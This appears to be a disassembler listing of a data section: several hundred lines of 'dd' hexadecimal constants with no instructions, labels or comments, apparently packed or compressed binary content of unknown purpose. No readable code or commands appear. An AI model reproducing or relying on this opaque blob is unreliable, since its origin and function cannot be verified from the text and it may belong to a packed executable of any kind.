dd 0C77F2Eh, 5D8E832Fh, 18069C6Bh, 2259344Bh, 6BDED942h
dd 31C2C0Bh, 389F1863h, 0EB3A9BB4h, 0B58FDE02h, 0F709BE56h
dd 0DF58878Ch, 5CA24CCEh, 9BDBB60Ch, 4EB89331h, 7D834B58h
dd 0FF21610Ch, 83D2C190h, 9D753E78h, 1EEBCE2Eh, 7E1840C7h
dd 3A7B115h, 35201556h, 78E0D22Fh, 40592A5Eh, 78100218h
dd 527EF7CCh
dd 8A1850ABh, 0A06D6015h, 22F62EB2h, 5672854Ah, 0C68C5873h
dd 0A274EB53h, 0ECEB36B2h, 0DD1CC631h, 5E75DE56h, 0C86C0628h
dd 0CAA37DEh, 72582834h, 0E223C36Bh, 4E57F85Dh, 0B51183E0h
dd 728F68C0h, 2E79D2FCh, 0B7E9FBC5h, 7B548FE4h, 0B86005EBh
dd 64568D72h, 7F740C55h, 7F89BFDBh, 80F0EB36h, 3700647Eh
dd 8B53684Eh, 418B6051h, 52305A6Ah, 810CE91Bh, 708AFFBh
dd 0C0A90DAEh, 0D8CFA285h, 0B22C0375h, 66A5F4ADh, 18B81058h
dd 0B08428Bh, 3495C807h, 0A95B7348h, 0EC1830FCh, 1029EB1Eh
dd 7DCDD08Ah, 0AB5C0461h, 0BBD402E0h, 9774CFEh, 2CF8190Fh
dd 0E3533F5Fh, 480F2C41h, 0DB85D8FCh, 0DFFFFCAEh, 2955F1D5h
dd 8FA8110h, 75400100h, 0E718D47h, 0A5247B8Dh, 288BA566h
dd 15AD5B10h, 765C3007h, 0DE90542Bh, 638369F3h, 0DB3019C4h
dd 0CEB1DAEh, 0F612201Ah, 0DD6EDC1h, 66040966h, 20A11407h
dd 95DD0B29h, 36EBED9Eh, 0D618094Eh, 0AB66AB4Dh, 0F3352BDBh
dd 0F63E2A07h, 0D80B1F42h, 143056CEh, 93ED0C27h, 947CDB1Ah
dd 51140A11h, 0DC38BC52h, 0E0DBC3DDh, 10AF930Ch, 14708D3Dh
dd 8070296h, 67D9D333h, 87DE8D59h, 8B212A1Ch, 0B2055590h
dd 57B216Fh, 5850D771h, 0DB2022EBh, 0F06D03Fh, 528B921Bh
dd 0F1218330h, 7E164C50h, 37694CB8h, 4513C50h, 2325833Ch
dd 9980F852h, 23183A00h, 0ECACAF4Fh, 0F18BD33Ch, 9F1DCF0Bh
dd 3BB90510h, 0F09688F9h, 3B60A5FCh, 80C73294h, 0C4788D52h
dd 5F0E7D3Bh, 407CA2h, 478B4097h, 0E869FC3Ch, 8708499h
dd 0A8576CD3h, 0E7035A1Dh, 8FE31CFEh, 0D77241D8h, 0D72A528Ah
dd 8C3118EBh, 0F246170h, 770C3D20h, 2F09DF24h, 3FF4BE0Ch
dd 0E33748A7h, 4AF4BEEFh, 0F77D89CFh, 5B3ADCB8h, 0F8B6B6FBh
dd 0E7B40118h, 0E141F6FCh, 0FBBB9AD7h, 0F3A6B674h, 1BEDB376h
dd 9A3A1948h, 0E2447F83h, 3661D051h, 0D3C11663h, 0B2311644h
dd 0E552D195h, 28F60D8Bh, 0D3E3A2BAh, 76A71E56h, 2254AA60h
dd 61A374E0h, 0A9F97FFFh, 8B3A6253h, 118BC14Dh, 674D285h
dd 108BC28Bh, 0E083F6EBh, 7BAE16C6h, 0A853B4F4h, 2F8EEB0Ah
dd 4B2D58EEh, 20830CA6h, 7682801Ah, 0CF132974h, 845114A0h
dd 0C39005EAh, 4D425638h, 0EF143F96h, 0BF76BEFh, 0D08699FFh
dd 460A06BAh, 637C5060h, 8CBB07BCh, 0BAA83986h, 34F4B3D3h
dd 670C10E3h, 3CA22464h, 2321A792h, 313F077h, 0DC5BF86Ch
dd 0D6A5C7Bh, 755A03FFh, 4BA58B19h, 0A17C112Ch, 7744A750h
dd 0E519722Dh, 67B6FB5Bh, 2A4B0306h, 18591CEBh, 488B0A73h
dd 0F82376CFh, 731477CEh, 13EB4F05h, 2D08401Dh, 66B41AD0h
dd 0A9EB232Ch, 0D5EADC1Bh, 148B2C0Bh, 0F67B3602h, 0BA6739C1h
dd 108FC16Bh, 13DC1084h, 36DCD85Fh, 18A508B3h, 27F7620h
dd 2DF8207Dh, 14045F2Dh, 34F46583h, 76FFFE62h, 40DBBF0Dh
dd 184D6889h, 0C33DD950h, 731C7D39h, 1BE86097h, 452BC7EBh
dd 4BA2B11Ch, 21FD3AB0h, 73FF4043h, 67DF7C38h, 46EC9EC5h
dd 40538A24h, 80F89927h, 800A0D7Fh, 2BBA528Bh, 0B2C9F475h
dd 4C4F7815h, 0EC343BC2h, 36360580h, 66342640h, 7565D81Dh
dd 5EB35E24h, 41BA68EBh, 6846A16Bh, 0C137C985h, 51D855C0h
dd 79834FEEh, 0E1A949F1h, 25746152h, 89540849h, 0CB6359B2h
dd 14E2E7C5h, 0DA850B78h, 8014F80Fh, 781A1C60h, 2155364Ch
dd 2E0A5F6h, 0E182A5F3h, 1DA4F303h, 0F600D270h, 7C8D0442h
dd 73D1A10h, 34FC07DBh, 608318B3h, 8CE4D48h, 631B6944h
dd 83882517h, 8B1055CFh, 1FBBB925h, 73838DF0h, 89113C4Ah
dd 0D4054042h, 691B133Eh, 0C1A00B3Ch, 30872D08h, 2E93AFB6h
dd 77F424CEh, 9A23AEF4h, 83C1C099h, 4C08448Dh, 4306085Eh
dd 7526291Fh, 20D83670h, 0EFE8F2D9h, 3874ECE8h, 48E96C3Eh
dd 0A27E5148h, 6EE6DF1Ch, 535C73F4h, 44342E54h, 88DB482Ch
dd 8E44A955h, 2770BF20h, 0F73B156Dh, 710CD0B3h, 743A3C39h
dd 0CC375BA4h, 4160DFA6h, 0C34049D3h, 0D83A46B2h, 2358BC4h
dd 0C8AAD6h, 0D79EC342h, 8CD308BAh, 29D63406h, 3F4A376Bh
dd 0F09C2C64h, 0B805EB30h, 23201C16h, 1CE12CD0h, 716C8409h
dd 15348308h, 23889404h, 269C0CCFh, 2CF6CA57h, 57090234h
dd 533F0C31h, 0E95AC1C1h, 14EB1B75h, 0C0EC35DBh, 0BEACD98Bh
dd 0DA2B2075h, 1393A572h, 0A4D88357h, 0DA12F8FBh, 522C1054h
dd 61022B74h, 0CDB4D9F1h, 3C75B02Dh, 0B6596CB2h, 2303C6Dh
dd 0ED24282Ch, 8587B06Eh, 0E62C1074h, 0DC622D2Ch, 511A05AAh
dd 823AD083h, 0FD099D6Fh, 0FAC28BFh, 28024FB7h, 0FA469AF5h
dd 0E3DD728h, 0C64B6361h, 21BBF65Bh, 0A028399Dh, 15B7095Ah
dd 8134080Eh, 0D6E66311h, 21F1DE5h, 0B5CA830Ah, 0B58B9EEBh
dd 5960168Ah, 88E62015h, 11CCC43h, 6D803BE0h, 7189C06Fh
dd 459890Bh, 1378C918h, 0CA4F61D8h, 1B22C857h, 8B154870h
dd 5C137207h, 9436D8C4h, 2F03B04Bh, 1BDB6CB2h, 1842A72Dh
dd 5A20056Ah, 0EDADC47Eh, 8B34883Bh, 0C23B8104h, 23B35C7Eh
dd 0EE578DF4h, 0B740368h, 81E9BE53h, 3C1BE756h, 1539E440h
dd 3E88FFDh, 8B250F85h, 6A8E2237h, 6177A13Dh, 59A258h
dd 0B38B01A0h, 0DDECA8D4h, 58BEF8Dh, 0FEBDC89h, 6A604324h
dd 7ED0211Ch, 0BEDAB01Bh, 0BF313990h, 6A3766CEh, 16758A15h
dd 3BB9EC63h, 231DF033h, 7136EC6Eh, 354D738Bh, 77096418h
dd 0DE7B574Dh, 58B65968h, 544C3005h, 1B1830B4h, 0D6CB2E46h
dd 5C480C18h, 1950AE54h, 345979ECh, 541A125Ch, 0AFFE1DB7h
dd 90E80DBBh, 4059D8Ch, 0C7445389h, 0A31C4800h, 291A7D2Bh
dd 0BEC63B01h, 44DB0293h, 0C77018EAh, 53067B43h, 10B7631Eh
dd 0A48EBA22h, 96F5C03Eh, 4CC6063Bh, 840C3421h, 0B9A0E512h
dd 5D146130h, 0BB354884h, 3526D721h, 29E80E2Ah, 0F758C907h
dd 78A6B259h, 916B570Ah, 0B58A8468h, 0F7B1875h, 29DE006Eh
dd 1A6FD40Ah, 7A8D1B6Ah, 9F075910h, 1858E02Ch, 0BFF3E14Dh
dd 2E1D7C06h, 105109C9h, 0A050984Eh, 991A3700h, 323243B7h
dd 46326B86h, 4DCE0CFCh, 398CA64Dh, 665BA360h, 0B6320AB4h
dd 0AD70D6Dh, 4A31AA64h, 77597A08h, 0D1DED8FBh, 0E0CA664Ah
dd 324B14AAh, 42C08571h, 0C681181h, 5FA8939Ch, 605C47ABh
dd 14B98F0Ch, 0D3CB428Eh, 530084F2h, 843B1931h, 5CBB800Eh
dd 0EC278A60h, 90A46ECCh, 8D8066E2h, 670A4E5Ch, 0C46E4145h
dd 0FA008897h, 25300C88h, 38EC8191h, 2BC41D10h, 125725CCh
dd 0CD6807BFh, 3304B9AEh, 0E6C3BAFFh, 0D89680D9h, 0FC04DCDAh
dd 3B3E6C9Eh, 0CA0CC812h, 0D010CC0Eh, 0D9910B18h, 0D41AD27Ch
dd 9466F820h, 36DD028h, 2CE213E0h, 0D5D40FD2h, 0A2531740h
dd 0A0083056h, 0C228656Dh, 995D8D57h, 0A7365B61h, 0C80A1ED6h
dd 0B7580C81h, 0D011CB21h, 500C83Bh, 0F6C8B7Dh, 11D83B18h
dd 788C3DB6h, 3FEE2284h, 0ECBA1F6Fh, 2004B809h, 7F0C8DF8h
dd 0B419E7C1h, 48EEC42Dh, 44D521C4h, 77F4DC07h, 56EFACE8h
dd 53BF773Ah, 8D458189h, 0D106DC60h, 0F6E0B541h, 96DE8C00h
dd 4D5B17A0h, 7D318BE0h, 4581C128h, 0AFAC99A0h, 0F4BBB9A2h
dd 0BAB60DFFh, 8DC2FF50h, 32B87373h, 6A9A2E89h, 7A8DDF00h
dd 0B6E5B5F8h, 0DF86675h, 3040883h, 96FB02ECh, 6F4D68Eh
dd 114279Dh, 0F0B41BE9h, 0B2176E6Dh, 5E377B85h, 460014F0h
dd 0FF1E19B9h, 0FEEE150Ch
dd 0A093A00Ch, 3889CABBh, 0C651E35Fh, 7BD41C31h, 6C6AE279h
dd 73718B8Ch, 0FE00F4Dh, 2CD3591Bh, 63A239A3h, 0FBC321C3h
dd 130C1A1Eh, 282B5AD1h, 8C140D71h, 26734182h, 0BA438364h
dd 0E017750Eh, 8308A80Eh, 9C383597h, 904C0D5Bh, 9BD2F893h
dd 8128481Ah, 0C401147Bh, 0B80775FCh, 0A6D834ACh, 4637EB2Ah
dd 0A445B957h, 93C5278h, 5304C053h, 735A01BDh, 682F8740h
dd 68F14CD9h, 9BBDFDC4h, 3B1D6A5Fh, 0BE4C8BBFh, 8193A354h
dd 7F061479h, 1AE00A1h, 81208D6Dh, 7605DC38h, 6854D005h
dd 6001B1Bh, 3C725E2Ch, 2FA39DDDh, 29665D14h, 19112830h
dd 9C9B584Ah, 582106EAh, 640611BAh, 0E8187151h, 49700E0Eh
dd 2117F67h, 589B7F08h, 57EE085h, 284A7427h, 0B952211Dh
dd 7A8D4D10h, 687D49C8h, 468C0C76h, 39578414h, 2BAB7EA4h
dd 46895F18h, 7C1E8B10h, 150FC0E0h, 0FAC38156h, 0B95E551Dh
dd 721FF87h, 60C38356h, 9AB8ECEBh, 1995ED51h, 73D64B18h
dd 7E748253h, 57DACCD5h, 0A577E434h, 0E830B89h, 0AA437632h
dd 7F478D47h, 9036FF47h, 80CC0BECh, 891840F1h, 87838147h
dd 579E9707h, 60579E7Ch, 0AC5A2DBDh, 0B43E8750h, 98057D68h
dd 6B3CA390h, 81E0663Ch, 0C683F06Eh, 7579FF04h, 450C4993h
dd 2D3218BEh, 1EF65810h, 712CD890h, 4650BE9Ch, 0D0480D8Bh
dd 0DFFBFEEh, 0D08A147Dh, 0C83B09B8h, 7541588h, 0FF065574h
dd 0EF3E1A2Dh, 98BC459h, 0F375DF3Bh, 944D1314h, 5379D61Bh
dd 9E976F9Bh, 56F98C35h, 1E47754Ch, 103844F0h, 0E1584B54h
dd 57184503h, 0C3C4DE1Ah, 0FDD7CA06h, 25340125h, 9710F750h
dd 18161CEBh, 0D58C102Eh, 44928733h, 0B618D126h, 1483553Ah
dd 42F84008h, 0A92F05A1h, 0D0EAB1CAh, 9CAB70BFh, 507C7589h
dd 0E4E8DF2h, 58EE5589h, 0E6ED1B75h, 0A5A3D35h, 829505B8h
dd 0BA8083B0h, 9C518C49h, 1C107B9h, 860F5581h, 0A09B0597h
dd 4E8F0483h, 2A748EEAh, 607EC0E5h, 7480350Fh, 0CA061F1Ah
dd 0AA3162Ah, 2A895327h, 2654F7C0h, 0E177C928h, 9E4A7461h
dd 1274F446h, 58A9649Dh, 5847388Ch, 64B7E0F4h, 4F30F400h
dd 5598430Ch, 0D0278DCAh, 0BA1F7827h, 0BCA23DD7h, 3104CA1h
dd 0A9422A7Ah, 81E045C7h, 0DD08A840h, 8A5414B0h, 0DF8E76E5h
dd 0A33772D6h, 0B9D3FF2Dh, 2E0E6A1Fh, 8F3447B4h, 41D60A23h
dd 0A256C51Eh, 315921ADh, 57361087h, 1C6EB780h, 150F04BDh
dd 0D7374450h, 9517F3Ah, 0D0B0FA0Ch, 8A99A266h, 0D54C5304h
dd 9037BE87h, 0A46FC25Ah, 0C7B2FFD3h, 3AC10D10h, 521FEB34h
dd 0C1D95152h, 387D6A78h, 3056D951h, 30EC908h, 345653BFh
dd 2251FA5h, 8CB000E0h, 0D41C27E7h, 80E53AA1h, 3C2D6DBFh
dd 0F0B31EAh, 0F3DC6887h, 71880C60h, 5F04D947h, 985A1039h
dd 8AE1A4Dh, 8123FCD0h, 590C86D7h, 26F011FCh, 420C9C87h
dd 0FCFCF8E4h, 2D812B3Bh, 0D28F5D3Ah, 0C61EE155h, 2C4B0C00h
dd 0C80CC9D8h, 8080C81h, 0E59193DDh, 80F1463h, 88E408F8h
dd 8BF8F253h, 0B38DF84Eh, 0E21D6803h, 855DB93h, 9BA68388h
dd 0F9A5E59h, 842D42Ah, 9E084A89h, 11AF1C01h, 2B651471h
dd 926F19B8h, 0C7F45E9h, 0D620D5C7h, 454CC803h, 10F2D2C2h
dd 38BAF3E0h, 1E770C7Eh, 9F210394h, 0CB113108h, 17212162h
dd 2156D48Ah, 39097EBEh, 0C9347C50h, 73C2D8F3h, 7F04DA2Dh
dd 1EBEC017h, 0E1449C48h, 0D90D74CEh, 897B7091h, 74C2E36Fh
dd 3B67B893h, 8740C20h, 77360F35h, 0EB8FECABh, 0A9658D8h
dd 0B299219Fh, 41431F07h, 810E4112h, 0FE0F5C25h, 81F46D93h
dd 43037759h, 97D75860h, 0C33490C1h, 0AF4476CCh, 3B21D9B0h
dd 0EC98AF6Dh, 9A401AA3h, 75095C00h, 84683DECh, 0B75D4E15h
dd 161C90EDh, 3B0A264Ah, 9A69362Eh, 0F29B08B1h, 6DF30CDEh
dd 2901C90Ch, 0A7581B0Dh, 0DB933491h, 473DDBEFh, 0E944C298h
dd 308DF586h, 69CF0E44h, 992A2D16h, 5314E30Ch, 0B8DDC075h
dd 60140773h, 75727E80h, 2ED21A4Eh, 398756E8h, 7495D233h
dd 0CA0C7930h, 0C048C4B1h, 6F4DB94Dh, 167AB7F7h, 58EC588Bh
dd 0FFE38110h, 0B8C4C0Fh, 6F750806h, 7E0C9B1Bh, 4A47D103h
dd 0F56B1ED2h, 147EE82Dh, 0C61689B9h, 0B85A9246h, 53B78FDh
dd 3EB1454h, 4948C8DEh, 235C1976h, 1925A75h, 2A3A1058h
dd 366FB76Bh, 754FFC8Ch, 796683EAh, 19866680h, 1B5024B6h
dd 3C17C252h, 17C4B618h, 3956BA02h, 1871105Dh, 7D9F2BCBh
dd 83E34C1h, 718B08CEh, 759CDF45h, 0D375615Dh, 5814D214h
dd 751C5938h, 6DBB5B50h, 5D1D41C1h, 804CEF8h, 6A976FDFh
dd 1450F3CEh, 0F8550148h, 5AD2D33Bh, 0C84E476Bh, 139418EBh
dd 0D4230CEAh, 0B6EFA5A6h, 0EBB3FFFAh, 2139D3CAh, 0FDFA8F14h
dd 4056F61h, 16D641C6h, 50646F6h, 5BEB0CDCh, 4A878AE7h
dd 56E48EF8h, 0E6E5C060h, 14A86C5Ah, 89AAADE1h, 0DDB2AF00h
dd 8B2D6B77h, 0A5F33B36h, 0EB3C7C74h, 4B77EDCFh, 3D743E75h
dd 77147255h, 29C28B02h, 0BB76E06h, 13D02BDFh, 0A4EB9704h
dd 1BA0744Dh, 172B7610h, 4EFD686h, 3DD2F3DBh, 368DB6Bh
dd 0CD4D9ADh, 1229CB27h, 18AB9AB4h, 202CC22Ah, 86DABB48h
dd 37110115h, 0B54B4E86h, 0CAAAC243h, 46658714h, 0BDAB1F6Fh
dd 59066A57h, 56FE8B14h, 10E340B8h, 0D2991B4h, 0CD6ACC2Dh
dd 6DC4A3EEh, 156614A0h, 12B302B6h, 241E088h, 50D75062h
dd 29C533Ch, 6FCC0CEEh, 7E8D1EFEh, 1FD06608h, 465459C0h
dd 568AE8EBh, 7ADB8069h, 0E52ECE0Fh, 0E7BD3114h, 61DD6CCh
dd 6820F454h, 642DD81Eh, 619DB0CFh, 6500101Dh, 4036A91Ah
dd 0BDEE5A55h, 462D54B4h, 0FE34FD6Fh, 8CA02CB7h, 0F39FF98Ch
dd 54D6ED6Fh, 0F9D19AB8h, 0DA75273Fh, 78EC03Eh, 513C5F82h
dd 0D4B85393h, 37170E42h, 0BC575BABh, 721B6ABAh, 87B249BEh
dd 3F736DFh, 0F9190B68h, 20B1FC0h, 46473C8Ch, 0C800D2C4h
dd 0FC18888Eh, 0CB85CC8Ch, 0C68DED02h, 36B3F803h, 1A24C19Ch
dd 61B456Ch, 1781BD63h, 27D19A3Fh, 7E4D7701h, 908B4298h
dd 0BD40B06Fh, 830C33FBh, 0E9F714C1h, 0A8F1B6CDh, 0F458853h
dd 3314756Eh, 7DB38447h, 4D8A7447h, 32A4170Fh, 7031F620h
dd 0B1AE6225h, 6BED052h, 646D80B8h, 0A38109B3h, 0B2701F29h
dd 7982FB1Dh, 0CE49E80Ch, 94BE43D1h, 5B535241h, 55746A70h
dd 0B1B9E0A4h, 9E147E08h, 6D5BBAF8h, 0C4201CD0h, 23F61122h
dd 2B762060h, 0D8C7E0E8h, 80180305h, 1E89EF17h, 0F02F6CE5h
dd 8E9076C0h, 0B771FB3Bh, 247B7D1h, 8F7BE39Ah, 9F8B2B54h
dd 97CCFD5Ah, 887880Ch, 0D83B0B02h, 351EF012h, 19EA2223h
dd 64D42846h, 1AF54BECh, 424C22F3h, 531F8021h, 735B3320h
dd 96830111h, 819C0885h, 1C068158h, 16D1D043h, 4D99B362h
dd 0D4BD1E4Bh, 46464646h, 0DC94D8FCh, 46F6161Fh, 0A5CBB30Dh
dd 0EFBD8D69h, 0C78BBF61h, 8BC54D89h, 5BBBF18h, 0A25781A3h
dd 0EC65CC7Eh, 9411A508h, 37893DCAh, 9D6F263Eh, 1A496C1Bh
dd 0B602EC0Fh, 0AB6831FFh, 61135B3h, 0FFF04150h, 0FB6C5EF7h
dd 0A2278303h, 0A559F093h, 88403FBFh, 53ABB739h, 0FFFFFE1Ah
dd 21B30833h, 249F4A8Ah, 43850A90h, 0C64657E9h, 0B054212Dh
dd 171F99EBh, 970E016Dh, 6D3F88B2h, 1E3A3175h, 898A4805h
dd 516CC689h, 8BF54848h, 7992FFEDh, 0BF0246E2h, 30306B38h
dd 0EE6BD78Ah, 5063435h
dd 768A810Ch, 0CF0AD939h, 3F3BB3Ch, 0E11C231Ch, 0FE565ADEh
dd 0A3AC6A05h, 933B7593h, 1B3140A1h, 0B451329h, 14A30820h
dd 0FBAD46CEh, 234BC38Bh, 3CA692C1h, 0A1367014h, 0FBC3946Ch
dd 42B66C2Eh, 0A1728AE7h, 0DA043D8Ah, 0F6C4CD86h, 8B8AD04Bh
dd 6054F2h, 655CE133h, 806FC34Ah, 90494C35h, 0D9884D38h
dd 0C7DE27B0h, 30234E06h, 660F73Fh, 0F5528101h, 18363C05h
dd 45C72011h, 3240C362h, 0F48880C0h, 0EBA21A4Ch, 8C47C7B0h
dd 83659159h, 1C4D6C12h, 2F6D872h, 3C740F0Ah, 0DAB3C212h
dd 0E106B57h, 0E03CCD96h, 74F8083h, 1E0E85D8h, 7B830B4Dh
dd 8540B94h, 8F547C0Fh, 0E7931EE8h, 1BBBBE2Dh, 35750252h
dd 19741005h, 831247F6h, 9E00BD0Bh, 5C6A1075h, 0C530087Bh
dd 66BBB86Ah, 758FA7F3h, 539A570Ah, 163145Ah, 570228C0h
dd 0B2585232h, 0D0D12961h, 39D37B2Ch, 7401D0C6h, 0CC868B71h
dd 4BEC6419h, 8D534F27h, 86CBCD9Eh, 19192190h, 0EF86868Eh
dd 960E464Eh, 1545BCBh, 0B1571375h, 56AC5D25h, 0AB04ACB6h
dd 5428E6E7h, 0CC057B01h, 91919102h, 0DCC4C891h, 919191BCh
dd 0C0B4B891h, 919981D0h, 0E0D8D491h, 0C9452800h, 0E200FFC8h
dd 9EE886EDh, 0BAE904h, 235686F0h, 2170BFC2h, 0BA01FB36h
dd 8B0E5A4Dh, 0C6033C70h, 1C8DB454h, 100641BCh, 0C2D16F00h
dd 0EB386ED7h, 1635EE0h, 0BADD221Ah, 901426FCh, 0F17C0B17h
dd 7D7A4A76h, 0E87F071Dh, 37FFADEh, 8A188AC2h, 751E3ACBh
dd 30C9841Ah, 0C01588Ah, 15BB715Eh, 46905D50h, 0E2751146h
dd 7605A3FFh, 401B05CFh, 831B4FD8h, 83022045h, 8B42A681h
dd 96723CC7h, 57C5FC3Bh, 0BC727AB3h, 20EE4A33h, 8FF06A2Dh
dd 0B70F0CADh, 8DF22B00h, 82D4455Dh, 630B5B8h, 0AA4EDF81h
dd 53FA2BDAh, 6164410Ch, 0C8003170h, 13F452B5h, 0D60F0403h
dd 3BA5FB0Eh, 6F636F74h, 1244176Ch, 0F4533019h, 42671752h
dd 0C16778F1h, 94D55677h, 0EBC4B4Dh, 2BBEC648h, 0CA94091h
dd 2A02811Dh, 87F4E456h, 0B0BED557h, 16387870h, 0ECF20320h
dd 2D0B157Ah, 8B244E75h, 0FA74032Ch, 0DFA3A05Dh, 0FEC5DB0h
dd 3F53C320h, 220F4FFFh, 6B621601h, 20510F48h, 4BD45076h
dd 9E9E56C1h, 2D346883h, 3EA96A38h, 311A57DAh, 0F3481CA3h
dd 205D12B0h, 20481694h, 141C85CFh, 7C8760C2h, 0EC187217h
dd 47A37862h, 3E50CEB3h, 88895B92h, 5E2B66B5h, 1227105h
dd 0DE210E23h, 745FFB67h, 0E91807F1h, 63BB2FA1h, 95C76F14h
dd 3D24053Fh, 5BF7505Ch, 454400D1h, 690076h, 895C0763h
dd 876DDDC2h, 730B64h, 0D7AE0772h, 611B9B75h, 1D6D030Bh
dd 1B720374h, 203C5D63h, 3B558CDFh, 8DC11763h, 6E651F74h
dd 7D179B21h, 49506DCFh, 752EDh, 0B6426F63h, 6937CC0Dh
dd 0B3275C0Dh, 0A9119440h, 3218866Ch, 0F0D0BDB4h, 2EA8685Ch
dd 0E25E5009h, 0DA186809h, 2153B281h, 5606D4F7h, 1C4B5012h
dd 865A2826h, 8308E25Ah, 0F6ADDA95h, 70D85B7h, 22C4AA58h
dd 5153944Dh, 6F3BFC68h, 9476D6EEh, 9C889820h, 0B0060DC8h
dd 0E46206FEh, 14B43EE6h, 0E0B8142Fh, 0DB2DB6C0h, 0CC288FF6h
dd 57D4D002h, 880C7E20h, 68E83EE6h, 79402F0Ch, 0C41B2F73h
dd 1E241816h, 6A38568Bh, 0E21501DEh, 46FA8B1Bh, 1AB859A1h
dd 6F0DE007h, 0B8F716D1h, 5E920920h, 70028934h, 0F25E8BF5h
dd 4B868940h, 63547846h, 0FA22C115h, 0CEFFB894h, 687447EEh
dd 6CA30458h, 0B8D6FF0Eh, 0F3C88648h, 4C50157Ch, 0F41CEA48h
dd 6A53C1D0h, 0ECF329CCh, 3D736F4Dh, 96595183h, 34402FF3h
dd 51F1F068h, 0AC4F076h, 0A012F098h, 53140D0Fh, 0D97A32D4h
dd 12D84A06h, 301330CCh, 1D65E533h, 30E0C303h, 2A345644h
dd 0B4C9A030h, 64FD2B02h, 1C81F50h, 53D3654Bh, 4C6E6970h
dd 51ADEA0Ch, 1211774h, 0AEFEFB49h, 7953FEDDh, 1C6F626Dh
dd 171A4C63h, 74520394h, 8975516Ch, 0DB6B36Ah, 61074979h
dd 0ED925508h, 431B3173h, 0B677A895h, 565C642Bh, 6DAD542Bh
dd 2D496450h, 0AA6B2916h, 669566FEh, 706D6F43h, 7164656Ch
dd 1B92DB3Eh, 0F7F395h, 0C6C06342h, 5A4A68A0h, 0F6B517FAh
dd 6E49F24Dh, 3C455D37h, 0FAA1257Eh, 2D75E85h, 6B957350h
dd 27B3B09Fh, 6F5422BDh, 8D1B6E41h, 0E65176Bh, 644DEA33h
dd 0B6C7BFF2h, 4D024E7Eh, 4CEC4D6Dh, 6761506Bh, 0A802BAD7h
dd 4FE07B9Ah, 661E6662h, 585E7E03h, 17D44DB3h, 421452B5h
dd 0CEDAA179h, 14541AAh, 0C355EE78h, 5417D9F6h, 0F9137079h
dd 0FF955369h, 1A05186Dh, 726B736Fh, 652E6C6Eh, 0D6E12E78h
dd 664BB536h, 7361384Bh, 73364F82h, 4113EFC9h, 69757163h
dd 77085072h, 0DEDB42EDh, 71724973h, 3E0D48ADh, 0BB336961h
dd 0D7B70B6h, 0A37044D4h, 41175D65h, 7C08B14Ch, 0C1749551h
dd 6764B5DBh, 1176AD55h, 0A95B22DCh, 5074E2DAh, 0CC27158Bh
dd 0FEA870DDh, 667542BDh, 81C819D4h, 332CE425h, 0E496029h
dd 45725F4Bh, 6DEA8D0Ch, 63724100h, 0F685C5BDh, 0BAA3D6DAh
dd 0EF33226Eh, 0BC2AAB36h, 0AE69B7h, 0A033011Fh, 0CF6C3DE4h
dd 4136E55Ah, 256F4274h, 2D92B726h, 2B959980h, 8DDD662Bh
dd 70566548h, 156D3C79h, 15876422h, 0F9751D14h, 891F491Ah
dd 59532E0Dh, 4AC8A153h, 8901D5F1h, 2D17B618h, 1E69007h
dd 48041930h, 14B2C95Bh, 1304C04Fh, 53C0D743h, 5F9D56B4h
dd 0CDED4505h, 5340D034h, 5FB34FABh, 0FE788B05h, 4F0B46B9h
dd 0FEEF04BDh, 26C36D03h, 75D452Bh, 0B4EF473Fh, 19017210h
dd 1D733163h, 744F6C34h, 6735697Bh, 839B074Dh, 0D6C61AEh
dd 2B660D49h, 0B1BC4023h, 34B93BAEh, 62073903h, 75D064C7h
dd 171E751Dh, 736D2343h, 0C80D14B0h, 61812073h, 7418C188h
dd 20AF6B61h, 0F74D339Bh, 6307D13Dh, 79206F11h, 0E0C43D92h
dd 1407CF76h, 0DC0CC153h, 79533DF6h, 375DF34Fh, 54CF9DD6h
dd 6E2D4B33h, 520D6C05h, 7BAE066h, 137531C3h, 0E61D8DCFh
dd 4715119Eh, 631544CBh, 8DD74494h, 69797069h, 5B1F6E2Dh
dd 49B6F759h, 65215168h, 89055399h, 36B901h, 5881560Bh
dd 4B971C2Bh, 585EF32h, 0C8D8F307h, 2E373135h, 0C44F0700h
dd 74B06665h, 6ED561B7h, 90B6EBAFh, 2F2971E7h, 29671B4Ch
dd 0EEB1B84h, 8D79930Dh, 1021A367h, 13D9ECAEh, 0EB061B20h
dd 15A9BA1Ah, 530BF32h, 6233092Dh, 9B8ACEC2h, 3054770Ch
dd 6DC62F0Dh, 72C75164h, 0B38F7426h, 7D29576Fh, 8D830B6Bh
dd 1FD5CC34h, 69934F3Eh, 66126C09h, 0EF6E2FE7h, 0BAC1A461h
dd 5779072Eh, 75500D20h, 6C6E7C7h, 0B9425761h, 0C46F643Fh
dd 5C48BEE8h, 750F6F1Fh, 8CA2EF43h, 3A774525h, 212308BBh
dd 0DFE15B64h, 46CEE7DEh, 5F7553B7h, 61D2F569h, 44B7C26Ch
dd 5D43561Fh, 56E88709h, 6D842400h, 0B6E8C27Ah, 611F7315h
dd 0B00409A3h, 0CD90337Fh, 80A80315h, 0D034C433h, 0D55BDF34h
dd 0EE34FFFFh, 1B350F34h, 39352A35h, 0D135A635h, 0E035D735h
dd 6FFA32A7h, 6B36FF55h, 9B368A36h, 1099A436h, 1C378A37h
dd 0FF384638h, 3A17FFFFh, 38C3385Fh, 38FE38E2h, 39383928h
dd 394B3945h, 39B63965h, 39E639D3h, 0FFFF39F9h, 3A39FFFFh
dd 3A473A40h, 3A553A4Eh, 3A633A5Ch, 3A713A6Ah, 3A903A78h
dd 3AA83A9Fh, 3AF43AB1h, 0FFFF3B08h, 3B10FFFFh, 3B763B15h
dd 3C0C3B7Eh, 3C8C3C72h
dd 3D093C9Fh, 3DB03D31h, 3E3A3DB9h, 3E973E80h, 0AF8B3E9Eh
dd 3EBEFFFFh, 3F353F04h, 3F623F4Ch, 3F7D3F6Eh, 84F93FF0h
dd 0FFF27B10h, 20C066FFh, 11310530h, 39312A31h, 78316C31h
dd 98318931h, 2320C31h, 23FFFFC0h, 44332B33h, 0E333C233h
dd 13340B33h, 29341834h, 0FFDDFF8Fh, 0C13458FFh, 0FB34F334h
dd 29352134h, 81352E35h, 0E5CB8935h, 0FD35F335h, 23361635h
dd 0FFF77F46h, 39363036h, 58364136h, 82367C36h, 0DD36BADBh
dd 53384E36h, 0FFFFFF0Eh, 387D38FFh, 38B13890h, 39B1393Eh
dd 3A223A17h, 3A683A5Eh, 3AE83AC6h, 3B283B1Dh, 3B853B7Ch
dd 0FFFBBFB7h, 3C073BFEh, 3C703C68h, 3C803C76h, 3CE7B988h
dd 3D5D3D50h, 453E2E34h, 0FFFFFFFEh, 503E4A3Eh, 6E3E573Eh
